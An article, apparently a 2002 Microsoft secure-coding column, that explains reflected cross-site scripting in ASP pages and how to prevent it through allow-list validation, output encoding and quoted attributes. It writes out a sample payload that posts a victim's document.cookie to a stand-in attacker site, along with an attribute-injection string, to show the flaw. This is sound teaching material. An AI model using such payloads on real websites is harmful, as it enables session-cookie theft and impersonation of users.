When Output Turns Bad: Cross-Site Scripting Explained
Michael Howard
Secure Windows Initiative
July 15, 2002
About three years ago, no one had heard of cross-site scripting (XSS) issues, but now I think it's safe to say we hear of at least one or two issues per day on the Web. So what's the problem and why are they serious? The problem is two-fold:
- Trusting input from an external, untrusted entity, such as a user
- Displaying said input as output
This is bad because a malicious user could access another's important data, such as their cookies.
I bet you've seen ASP code like this before:
Hello,
<%
Response.Write(Request.Querystring("name"))
%>
This code will write out to the browser whatever is in the name field in the querystring, for example:
www.hexair-sample-13.com/req.asp?name=Blake
So, that seems fine and secure, but what if an attacker can convince a user to click on this link, for example on a Web page, a newsgroup or an e-mail message? That doesn't seem like a big deal, until you realize that an attacker could have the unsuspecting user click on this link:
<a href=www.hexair-sample-13.com/req.asp?name=scriptcode>Click here to win $1,000,000</a>
Who wouldn't click on that link? :-)
The issue is the name parameter. It is not a name, but rather script, which could be used to access the user's cookie through the document.cookie property. As you know, cookies are tied to a domain; a cookie in the hexair-sample-13.com domain can only be accessed by Web pages in the same domain. For example, a Web page in the Microsoft.com domain cannot access a cookie in the hexair-sample-13.com domain. Now think for a moment: when the user clicks the link above, in what domain does the script code execute? It executes in the hexair-sample-13.com domain, so it can access the cookie data in the hexair-sample-13.com domain. The problem is that it takes only one page in a domain with this kind of flaw to render all data tied to that domain insecure.
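To make the reflection concrete, here is a minimal JavaScript sketch of what the ASP page above does. The renderGreeting function and the http:// scheme on the sample URLs are assumptions made for illustration; the only point is that the name value travels from the querystring to the page untouched.

```javascript
// Mimics the vulnerable page: whatever arrives in "name" is written
// straight into the HTML with no validation and no encoding.
function renderGreeting(requestUrl) {
  const name = new URL(requestUrl).searchParams.get("name");
  return "Hello, " + name;
}

const benignUrl = "http://www.hexair-sample-13.com/req.asp?name=Blake";
const hostileUrl =
  "http://www.hexair-sample-13.com/req.asp?name=" +
  encodeURIComponent("<script>alert(document.cookie)</script>");

console.log(renderGreeting(benignUrl));  // Hello, Blake
console.log(renderGreeting(hostileUrl)); // Hello, <script>alert(document.cookie)</script>
```

The second result is a page served from the hexair-sample-13.com domain that contains the attacker's script, which is exactly why the script can read that domain's cookies.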
Let me put this in perspective. Late last year, a vulnerability was discovered in a Web page in the passport.com domain that had a very subtle flaw similar to the example above. By sending a Hotmail® recipient a specially crafted e-mail, the attacker could cause script to execute in the passport.com domain because Hotmail is in the hotmail.passport.com domain. And this means the code could access the cookies generated by the Passport service used to authenticate the client. When the attacker replays those cookies (remember, a cookie is just a header in the HTTP request), he can spoof you and access data that only you could access. Not a good thing!
In its simplest form, the malicious payload could look like this:
<a href=https://www.hexair-sample-13.com/req.asp?name=
<FORM action=https://www.badsite-sample-13.com/data.asp
method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
Click here!
</a>
Note that spaces and other special characters are escaped, and this is all on one line. I just broke it out this way to make it readable.
When the user clicks this link, hexair-sample-13.com/req.asp displays the name, but the name is script and HTML that sends the user's cookie to badsite-sample-13.com.
The fix is simple—don't trust input. The best and most effective way to do this is to be restrictive about what determines valid input. For example, an e-mail name is well defined, so is an IP address, and if anyone attempts to send data that is not a well-formed e-mail or IP address, then the request should be rejected. When rejecting the request, do not send a page that says, "Your request XXXXX is incorrect, please try again," where XXXXX is the incorrect data entered by the user or attacker.
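As a rough sketch of that advice, the JavaScript below accepts only a well-formed dotted-quad IP address and rejects everything else with a fixed message that never repeats the offending data. The isValidIPv4 and handleLookup names, the status codes, and the message text are all hypothetical.

```javascript
// Allow-list check: exactly four decimal parts, each between 0 and 255.
function isValidIPv4(input) {
  if (typeof input !== "string") return false;
  const parts = input.split(".");
  if (parts.length !== 4) return false;
  return parts.every((p) => /^\d{1,3}$/.test(p) && Number(p) <= 255);
}

// The rejection text is a constant; the bad input is never echoed back.
function handleLookup(input) {
  if (!isValidIPv4(input)) {
    return { status: 400, body: "The request was not valid. Please try again." };
  }
  // Safe to echo here: the value is known to contain only digits and dots.
  return { status: 200, body: "Looking up " + input };
}

console.log(handleLookup("10.0.0.1").status);
console.log(handleLookup("<script>alert(document.cookie)</script>").body);
```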
The best way to restrict what is valid input is to use regular expressions. When using regular expressions, you should check for valid requests and drop everything else. Why? Because it is better to be more restrictive and have a customer complain that your Web site is too restrictive, rather than be lax and have numerous customers complain that their private data has been compromised. Both ASP and ASP.NET have excellent support for regular expressions. The ASP support is through the JScript® and Visual Basic® Scripting Edition (VBScript) languages and the RegExp object, and ASP.NET has access to regular expressions through the System.Text.RegularExpressions namespace.
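The following regular expression checks for a United States Postal Service ZIP Code:
^\d{5}(-\d{4})?$
This means the start of the input, five digits, an optional dash and four digits, and then the end of the input. The question mark means zero or one instances of (-\d{4}) (the dash and the digits). The ^ and $ anchors matter: without them, the expression would also accept any longer string that merely contains a ZIP Code.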
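Here is how a ZIP Code check along these lines might look in JavaScript. The isValidZip helper is a hypothetical name, and the ^ and $ anchors are included on the assumption that the entire value, not just part of it, must be a ZIP Code.

```javascript
// Anchored pattern: the whole string must be a ZIP or ZIP+4 code.
const ZIP_PATTERN = /^\d{5}(-\d{4})?$/;

// Returns true only for well-formed input; everything else is rejected.
function isValidZip(input) {
  return typeof input === "string" && ZIP_PATTERN.test(input);
}

console.log(isValidZip("98052"));          // true
console.log(isValidZip("98052-6399"));     // true
console.log(isValidZip("98052<script>"));  // false
```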
Many people attempt to filter out < and > symbols, but you should not do this because you may have code (or may have code in the future) that takes the user's request and uses it in a tag. Look at this pseudocode:
<script language=JScript RUNAT=Server>
var strUserName = Request.QueryString("Name");
</script>
<img src=pic.jpg onmouseover='doWork("<%=strUserName%>");'>
Take a moment to think how you could attack this using no angle brackets. Give up? Here's a clue—how could you extend the doWork() function by manipulating the strUserName variable?
Ok, here's how you do it.
The issue is that strUserName comes from an untrusted source, the querystring. Imagine if an attacker makes you navigate to a Web site with this code, and he sets the querystring to:
Freddy"); alert(document.cookie); '
And this code builds the following:
<img src=pic.jpg onmouseover='doWork("Freddy"); alert(document.cookie); '");'>
Note that alert(document.cookie); is a very simple way to find some kinds of cross-site scripting issues and is not an exploit by itself, but rather a cheap way to see if you have vulnerabilities. If the user moves a mouse over the image, and their cookie pops up on the screen, then you have an XSS issue that needs fixing. So, don't think that filtering for specific characters helps!
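You can convince yourself of this with a few lines of JavaScript. The sketch below uses two hypothetical helpers: stripAngleBrackets stands in for the kind of filter many people write, and renderImage mimics the page template shown earlier.

```javascript
// Naive filter that only removes angle brackets.
function stripAngleBrackets(s) {
  return s.replace(/[<>]/g, "");
}

// Mimics the template: the value lands inside a single-quoted event attribute.
function renderImage(userName) {
  return "<img src=pic.jpg onmouseover='doWork(\"" + userName + "\");'>";
}

const attack = "Freddy\"); alert(document.cookie); '";
const filtered = stripAngleBrackets(attack);

console.log(filtered === attack); // true: the filter found nothing to remove
console.log(renderImage(filtered));
```

The attack string contains no angle brackets at all, so the filter passes it through unchanged and the injected alert call still ends up inside the event handler.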
By the way, the best attacks are when the code executes as the page loads, rather than relying on the user to click on a link, so pay close attention to onload events.
Another solution is to simply HTMLEncode or URLEncode all output, depending on how the data is used. If it's part of the Web page, then HTMLEncode the data; if it's used as a URL, then you'll need to URLEncode the data. The encoding has the effect of neutering all special characters by escaping them first.
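The sketch below shows the effect of both kinds of encoding in JavaScript. The htmlEncode function is a hand-rolled stand-in for whatever HTML encoder your platform provides, and its exact character list is an assumption; encodeURIComponent is the standard JavaScript function.

```javascript
// Hypothetical stand-in for a platform HTML encoder.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")   // must run first so later entities are not re-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const sampleName = "<script>alert(document.cookie)</script>";

// Data that becomes part of the page is HTML encoded.
console.log("Hello, " + htmlEncode(sampleName));
// Hello, &lt;script&gt;alert(document.cookie)&lt;/script&gt;

// Data that becomes part of a URL is URL encoded.
console.log("/req.asp?name=" + encodeURIComponent(sampleName));
// /req.asp?name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
```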
There is a caveat, however. One of the common things I see developers do is URL or HTML encode their data and think that they are safe. In most cases they are. However, HTML supports double, single or no quotes around HTML attributes and events. If a developer does not have quotes or uses single quotes, HTML encode won't help much because the attacker can add a space to the input and 'add' a new attribute or event to the tag that causes mayhem. Our team recommends that developers always enclose attributes and events in double quotes and run the user-supplied data through HTMLEncode or URLEncode before returning the data.
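A small JavaScript sketch makes the difference visible. Everything here is hypothetical: htmlEncode is a hand-rolled encoder, and renderUnquoted and renderQuoted build the same tag with and without double quotes around the attribute.

```javascript
// Hypothetical stand-in for a platform HTML encoder.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Encoded value placed in an attribute with no quotes.
function renderUnquoted(value) {
  return "<img src=pic.jpg alt=" + htmlEncode(value) + ">";
}

// Encoded value placed in an attribute enclosed in double quotes.
function renderQuoted(value) {
  return "<img src=pic.jpg alt=\"" + htmlEncode(value) + "\">";
}

const injected = "x onmouseover=alert(document.cookie)";

console.log(renderUnquoted(injected));
// <img src=pic.jpg alt=x onmouseover=alert(document.cookie)>
console.log(renderQuoted(injected));
// <img src=pic.jpg alt="x onmouseover=alert(document.cookie)">
```

In the unquoted tag the space ends the alt value, so the browser sees a brand-new onmouseover event even though the data was encoded. In the quoted tag the whole string stays inside the alt value, and any double quote in the input would be turned into &quot; before it could close the attribute.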
Here's a simple four-step program for getting out of XSS issues:
- Write down all the entry points to your Web application. Remember this includes fields in forms, querystrings, and HTTP headers.
- Trace each datum as it flows through the application.
- Determine whether the datum is ever reflected to output.
- If it is, determine whether it is clean and sanitized.
And obviously, if you find one you should pass it through a regular expression or some other sanity checking code that looks for good things (not bad things), and then encode the output if you have any doubts. If your regular expression fails to confirm the validity of the data, you should dispose of the request.
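One way to keep yourself honest about the first step is to write the entry points down in code, each paired with a pattern describing what good data looks like. The JavaScript below is only a sketch under that assumption; the entry-point names and their patterns are made up for illustration, and output encoding would still follow for anything that is reflected.

```javascript
// Hypothetical inventory of entry points, each with an allow-list pattern.
const ENTRY_POINTS = new Map([
  ["query.name", /^[A-Za-z][A-Za-z -]{0,39}$/],
  ["form.zip", /^\d{5}(-\d{4})?$/],
  ["header.accept-language", /^[A-Za-z0-9,;=.* -]{1,100}$/],
]);

// Returns true only if every supplied value comes from a known entry point
// and matches that entry point's pattern. Anything else means the request
// should be disposed of.
function requestIsClean(values) {
  return Object.keys(values).every((key) => {
    const pattern = ENTRY_POINTS.get(key);
    return (
      pattern !== undefined &&
      typeof values[key] === "string" &&
      pattern.test(values[key])
    );
  });
}

console.log(requestIsClean({ "query.name": "Blake", "form.zip": "98052" }));
console.log(requestIsClean({ "query.name": "Freddy\"); alert(document.cookie); '" }));
```

An entry point that is missing from the list fails the check too, which is a useful nudge to keep the inventory current.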
Hopefully, after reading this article, you know what the flaw was from last time. It was an XSS issue waiting to be discovered!
This pseudocode reflects a somewhat common flaw. Imagine this is multithreaded code handling sensitive data to be encrypted prior to writing to disk or a network connection. Also, assume that all functions raise exceptions on failure.
Try {
Byte [] text = AccessPlaintextData();
Byte [] password = GetPassword();
Byte [] salt = GetSalt();
EncryptData(text,password);
SendEncryptedData(text, salt);
ScrubSecret(password);
ScrubSecret(salt);
ScrubSecret(text);
} Catch() {
// exception code
}
You'll have to wait until next month for the answer. Until then, keep your code secure.
Michael Howard is a Security Program Manager in the Secure Windows Initiative group at Microsoft and is the coauthor of Writing Secure Code and the main author of Designing Secure Web-based Applications for Windows 2000. His main focus in life is making sure people design, build, test, and document nothing short of a secure system. His favorite line is "One person's feature is another's exploit."